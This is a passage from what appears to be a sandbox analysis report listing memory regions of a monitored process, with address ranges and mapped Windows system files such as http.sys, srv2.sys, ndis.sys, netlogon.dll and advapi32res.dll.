"c:\\windows\\system32\\drivers\\en-us\\http.sys.mui") Region: id = 2264 start_va = 0x13b0000 end_va = 0x14c0fff monitored = 0 entry_point = 0x14a1bf0 region_type = mapped_file name = "http.sys" filename = "\\Windows\\System32\\drivers\\http.sys" (normalized: "c:\\windows\\system32\\drivers\\http.sys") Region: id = 2265 start_va = 0x410000 end_va = 0x419fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "http.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\http.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\http.sys.mui") Region: id = 2266 start_va = 0x13b0000 end_va = 0x14c0fff monitored = 0 entry_point = 0x14a1bf0 region_type = mapped_file name = "http.sys" filename = "\\Windows\\System32\\drivers\\http.sys" (normalized: "c:\\windows\\system32\\drivers\\http.sys") Region: id = 2267 start_va = 0x410000 end_va = 0x419fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "http.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\http.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\http.sys.mui") Region: id = 2268 start_va = 0x13b0000 end_va = 0x14c0fff monitored = 0 entry_point = 0x14a1bf0 region_type = mapped_file name = "http.sys" filename = "\\Windows\\System32\\drivers\\http.sys" (normalized: "c:\\windows\\system32\\drivers\\http.sys") Region: id = 2269 start_va = 0x410000 end_va = 0x419fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "http.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\http.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\http.sys.mui") Region: id = 2270 start_va = 0x13b0000 end_va = 0x14c0fff monitored = 0 entry_point = 0x14a1bf0 region_type = mapped_file name = "http.sys" filename = "\\Windows\\System32\\drivers\\http.sys" (normalized: "c:\\windows\\system32\\drivers\\http.sys") Region: id = 2271 start_va = 0x410000 end_va = 0x419fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "http.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\http.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\http.sys.mui") Region: id = 2272 start_va = 0x13b0000 end_va = 0x14c0fff monitored = 0 entry_point = 0x14a1bf0 region_type = mapped_file name = "http.sys" filename = "\\Windows\\System32\\drivers\\http.sys" (normalized: "c:\\windows\\system32\\drivers\\http.sys") Region: id = 2273 start_va = 0x410000 end_va = 0x41ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PSEvents.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\psevents.dll") Region: id = 2274 start_va = 0x420000 end_va = 0x42dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\PSEvents.dll.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\psevents.dll.mui") Region: id = 2275 start_va = 0x410000 end_va = 0x41ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PSEvents.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\psevents.dll") Region: id = 2276 start_va = 0x420000 end_va = 0x42dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\PSEvents.dll.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\psevents.dll.mui") Region: id = 2283 start_va = 0x410000 end_va = 0x416fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "rdpcorets.dll.mui" filename = "\\Windows\\System32\\en-US\\rdpcorets.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\rdpcorets.dll.mui") Region: id = 2284 start_va = 0x13b0000 end_va = 0x17b7fff monitored = 0 entry_point = 0x147e3b0 region_type = mapped_file name = "rdpcorets.dll" filename = "\\Windows\\System32\\rdpcorets.dll" (normalized: "c:\\windows\\system32\\rdpcorets.dll") Region: id = 2286 start_va = 0x410000 end_va = 0x416fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "rdpcorets.dll.mui" filename = "\\Windows\\System32\\en-US\\rdpcorets.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\rdpcorets.dll.mui") Region: id = 2287 start_va = 0x13b0000 end_va = 0x17b7fff monitored = 0 entry_point = 0x147e3b0 region_type = mapped_file name = "rdpcorets.dll" filename = "\\Windows\\System32\\rdpcorets.dll" (normalized: "c:\\windows\\system32\\rdpcorets.dll") Region: id = 2288 start_va = 0x410000 end_va = 0x416fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "rdpcorets.dll.mui" filename = "\\Windows\\System32\\en-US\\rdpcorets.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\rdpcorets.dll.mui") Region: id = 2289 start_va = 0x13b0000 end_va = 0x17b7fff monitored = 0 entry_point = 0x147e3b0 region_type = mapped_file name = "rdpcorets.dll" filename = "\\Windows\\System32\\rdpcorets.dll" (normalized: "c:\\windows\\system32\\rdpcorets.dll") Region: id = 2290 start_va = 0x410000 end_va = 0x416fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "rdpcorets.dll.mui" filename = "\\Windows\\System32\\en-US\\rdpcorets.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\rdpcorets.dll.mui") Region: id = 2291 start_va = 0x13b0000 end_va = 0x17b7fff monitored = 0 entry_point = 0x147e3b0 region_type = mapped_file name = "rdpcorets.dll" filename = "\\Windows\\System32\\rdpcorets.dll" (normalized: "c:\\windows\\system32\\rdpcorets.dll") Region: id = 2292 start_va = 0x410000 end_va = 0x421fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srv2.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\srv2.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\srv2.sys.mui") Region: id = 2293 start_va = 0x13b0000 end_va = 0x145efff monitored = 0 entry_point = 0x1427000 region_type = mapped_file name = "srv2.sys" filename = "\\Windows\\System32\\drivers\\srv2.sys" (normalized: "c:\\windows\\system32\\drivers\\srv2.sys") Region: id = 2294 start_va = 0x410000 end_va = 0x421fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srv2.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\srv2.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\srv2.sys.mui") Region: id = 2295 start_va = 0x13b0000 end_va = 0x145efff monitored = 0 entry_point = 0x1427000 region_type = mapped_file name = "srv2.sys" filename = "\\Windows\\System32\\drivers\\srv2.sys" (normalized: "c:\\windows\\system32\\drivers\\srv2.sys") Region: id = 2296 start_va = 0x410000 end_va = 0x421fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srv2.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\srv2.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\srv2.sys.mui") Region: id = 2297 start_va = 0x13b0000 end_va = 0x145efff monitored = 0 entry_point = 0x1427000 region_type = mapped_file name = "srv2.sys" filename = "\\Windows\\System32\\drivers\\srv2.sys" (normalized: "c:\\windows\\system32\\drivers\\srv2.sys") Region: id = 2298 start_va = 0x410000 end_va = 0x421fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srv2.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\srv2.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\srv2.sys.mui") Region: id = 2299 start_va = 0x13b0000 end_va = 0x145efff monitored = 0 entry_point = 0x1427000 region_type = mapped_file name = "srv2.sys" filename = "\\Windows\\System32\\drivers\\srv2.sys" (normalized: "c:\\windows\\system32\\drivers\\srv2.sys") Region: id = 2300 start_va = 0x410000 end_va = 0x421fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srv2.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\srv2.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\srv2.sys.mui") Region: id = 2301 start_va = 0x13b0000 end_va = 0x145efff monitored = 0 entry_point = 0x1427000 region_type = mapped_file name = "srv2.sys" filename = "\\Windows\\System32\\drivers\\srv2.sys" (normalized: "c:\\windows\\system32\\drivers\\srv2.sys") Region: id = 2302 start_va = 0x410000 end_va = 0x421fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srv2.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\srv2.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\srv2.sys.mui") Region: id = 2303 start_va = 0x13b0000 end_va = 0x145efff monitored = 0 entry_point = 0x1427000 region_type = mapped_file name = "srv2.sys" filename = "\\Windows\\System32\\drivers\\srv2.sys" (normalized: "c:\\windows\\system32\\drivers\\srv2.sys") Region: id = 2304 start_va = 0x410000 end_va = 0x413fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netlogon.dll.mui" filename = "\\Windows\\System32\\en-US\\netlogon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netlogon.dll.mui") Region: id = 2305 start_va = 0x13b0000 end_va = 0x1484fff monitored = 0 entry_point = 0x13de0b0 region_type = mapped_file name = "netlogon.dll" filename = "\\Windows\\System32\\netlogon.dll" (normalized: "c:\\windows\\system32\\netlogon.dll") Region: id = 2306 start_va = 0x410000 end_va = 0x413fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netlogon.dll.mui" filename = "\\Windows\\System32\\en-US\\netlogon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netlogon.dll.mui") Region: id = 2307 start_va = 0x13b0000 end_va = 0x1484fff monitored = 0 entry_point = 0x13de0b0 region_type = mapped_file name = "netlogon.dll" filename = "\\Windows\\System32\\netlogon.dll" (normalized: "c:\\windows\\system32\\netlogon.dll") Region: id = 2308 start_va = 0x410000 end_va = 0x470fff monitored = 0 entry_point = 0x420770 region_type = mapped_file name = "usbxhci.sys" filename = "\\Windows\\System32\\drivers\\USBXHCI.SYS" (normalized: "c:\\windows\\system32\\drivers\\usbxhci.sys") Region: id = 2309 start_va = 0x1160000 end_va = 0x1163fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usbxhci.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\USBXHCI.SYS.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\usbxhci.sys.mui") Region: id = 2310 start_va = 0x410000 end_va = 0x470fff monitored = 0 entry_point = 0x420770 region_type = mapped_file name = "usbxhci.sys" filename = "\\Windows\\System32\\drivers\\USBXHCI.SYS" (normalized: "c:\\windows\\system32\\drivers\\usbxhci.sys") Region: id = 2311 start_va = 0x1160000 end_va = 0x1163fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usbxhci.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\USBXHCI.SYS.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\usbxhci.sys.mui") Region: id = 2312 start_va = 0x410000 end_va = 0x470fff monitored = 0 entry_point = 0x420770 region_type = mapped_file name = "usbxhci.sys" filename = "\\Windows\\System32\\drivers\\USBXHCI.SYS" (normalized: "c:\\windows\\system32\\drivers\\usbxhci.sys") Region: id = 2313 start_va = 0x1160000 end_va = 0x1163fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usbxhci.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\USBXHCI.SYS.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\usbxhci.sys.mui") Region: id = 2314 start_va = 0x410000 end_va = 0x470fff monitored = 0 entry_point = 0x420770 region_type = mapped_file name = "usbxhci.sys" filename = "\\Windows\\System32\\drivers\\USBXHCI.SYS" (normalized: "c:\\windows\\system32\\drivers\\usbxhci.sys") Region: id = 2315 start_va = 0x1160000 end_va = 0x1163fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usbxhci.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\USBXHCI.SYS.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\usbxhci.sys.mui") Region: id = 2316 start_va = 0x410000 end_va = 0x470fff monitored = 0 entry_point = 0x420770 region_type = mapped_file name = "usbxhci.sys" filename = "\\Windows\\System32\\drivers\\USBXHCI.SYS" (normalized: "c:\\windows\\system32\\drivers\\usbxhci.sys") Region: id = 2317 start_va = 0x1160000 end_va = 0x1163fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usbxhci.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\USBXHCI.SYS.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\usbxhci.sys.mui") Region: id = 2318 start_va = 0x410000 end_va = 0x470fff monitored = 0 entry_point = 0x420770 region_type = mapped_file name = "usbxhci.sys" filename = "\\Windows\\System32\\drivers\\USBXHCI.SYS" (normalized: "c:\\windows\\system32\\drivers\\usbxhci.sys") Region: id = 2319 start_va = 0x1160000 end_va = 0x1163fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usbxhci.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\USBXHCI.SYS.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\usbxhci.sys.mui") Region: id = 2320 start_va = 0x410000 end_va = 0x457fff monitored = 0 entry_point = 0x44acf0 region_type = mapped_file name = "drt.dll" filename = "\\Windows\\System32\\drt.dll" (normalized: "c:\\windows\\system32\\drt.dll") Region: id = 2321 start_va = 0x460000 end_va = 0x462fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "drt.dll.mui" filename = "\\Windows\\System32\\en-US\\drt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\drt.dll.mui") Region: id = 2322 start_va = 0x410000 end_va = 0x457fff monitored = 0 entry_point = 0x44acf0 region_type = mapped_file name = "drt.dll" filename = "\\Windows\\System32\\drt.dll" (normalized: "c:\\windows\\system32\\drt.dll") Region: id = 2323 start_va = 0x460000 end_va = 0x462fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "drt.dll.mui" filename = "\\Windows\\System32\\en-US\\drt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\drt.dll.mui") Region: id = 2324 start_va = 0x410000 end_va = 0x420fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 2325 start_va = 0x13b0000 end_va = 0x14cffff monitored = 0 entry_point = 0x14ac040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 2326 start_va = 0x410000 end_va = 0x420fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 2327 start_va = 0x13b0000 end_va = 0x14cffff monitored = 0 entry_point = 0x14ac040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 2328 start_va = 0x410000 end_va = 0x420fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 2329 start_va = 0x13b0000 end_va = 0x14cffff monitored = 0 entry_point = 0x14ac040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 2330 start_va = 0x410000 end_va = 0x420fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 2331 start_va = 0x13b0000 end_va = 0x14cffff monitored = 0 entry_point = 0x14ac040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 2332 start_va = 0x410000 end_va = 0x420fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 2333 start_va = 0x13b0000 end_va = 0x14cffff monitored = 0 entry_point = 0x14ac040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 2334 start_va = 0x410000 end_va = 0x420fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 2335 start_va = 0x13b0000 end_va = 0x14cffff monitored = 0 entry_point = 0x14ac040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 2336 start_va = 0x410000 end_va = 0x420fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 2337 start_va = 0x13b0000 end_va = 0x14cffff monitored = 0 entry_point = 0x14ac040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 2338 start_va = 0x410000 end_va = 0x420fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 2339 start_va = 0x13b0000 end_va = 0x14cffff monitored = 0 entry_point = 0x14ac040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 2340 start_va = 0x410000 end_va = 0x420fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 2341 start_va = 0x13b0000 end_va = 0x14cffff monitored = 0 entry_point = 0x14ac040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 2342 start_va = 0x410000 end_va = 0x420fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 2343 start_va = 0x13b0000 end_va = 0x14cffff monitored = 0 entry_point = 0x14ac040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 2344 start_va = 0x410000 end_va = 0x420fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 2345 start_va = 0x13b0000 end_va = 0x14cffff monitored = 0 entry_point = 0x14ac040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 2346 start_va = 0x410000 end_va = 0x420fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 2347 start_va = 0x13b0000 end_va = 0x14cffff monitored = 0 entry_point = 0x14ac040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 2348 start_va = 0x410000 end_va = 0x420fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 2349 start_va = 0x13b0000 end_va = 0x14cffff monitored = 0 entry_point = 0x14ac040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 2350 start_va = 0x410000 end_va = 0x420fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 2351 start_va = 0x13b0000 end_va = 0x14cffff monitored = 0 entry_point = 0x14ac040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 2352 start_va = 0x410000 end_va = 0x420fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 2353 start_va = 0x13b0000 end_va = 0x14cffff monitored = 0 entry_point = 0x14ac040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 2354 start_va = 0x410000 end_va = 0x420fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 2355 start_va = 0x13b0000 end_va = 0x14cffff monitored = 0 entry_point = 0x14ac040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 2356 start_va = 0x410000 end_va = 0x420fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 2357 start_va = 0x13b0000 end_va = 0x14cffff monitored = 0 entry_point = 0x14ac040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 2358 start_va = 0x410000 end_va = 0x420fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 2359 start_va = 0x13b0000 end_va = 0x14cffff monitored = 0 entry_point = 0x14ac040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 2360 start_va = 0x410000 end_va = 0x412fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 2361 start_va = 0x420000 end_va = 0x430fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 2362 start_va = 0x410000 end_va = 0x412fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 2363 start_va = 0x420000 end_va = 0x430fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 2364 start_va = 0x410000 end_va = 0x412fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 2365 start_va = 0x420000 end_va = 0x430fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 2366 start_va = 0x410000 end_va = 0x412fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 2367 start_va = 0x420000 end_va = 0x430fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 2368 start_va = 0x410000 end_va = 0x412fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 2369 start_va = 0x420000 end_va = 0x430fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 2370 start_va = 0x410000 end_va = 0x412fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 2371 start_va = 0x420000 end_va = 0x430fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 2372 start_va = 0x410000 end_va = 0x412fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 2373 start_va = 0x420000 end_va = 0x430fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 2374 start_va = 0x410000 end_va = 0x412fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 2375 start_va = 0x420000 end_va = 0x430fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 2376 start_va = 0x410000 end_va = 0x412fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 2377 start_va = 0x420000 end_va = 0x430fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 2378 start_va = 0x410000 end_va = 0x412fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 2379 start_va = 0x420000 end_va = 0x430fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 2380 start_va = 0x410000 end_va = 0x412fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 2381 start_va = 0x420000 end_va = 0x430fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 2382 start_va = 0x410000 end_va = 0x412fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 2383 start_va = 0x420000 end_va = 0x430fff monitored = 0 entry_point = 0x0 region_type = 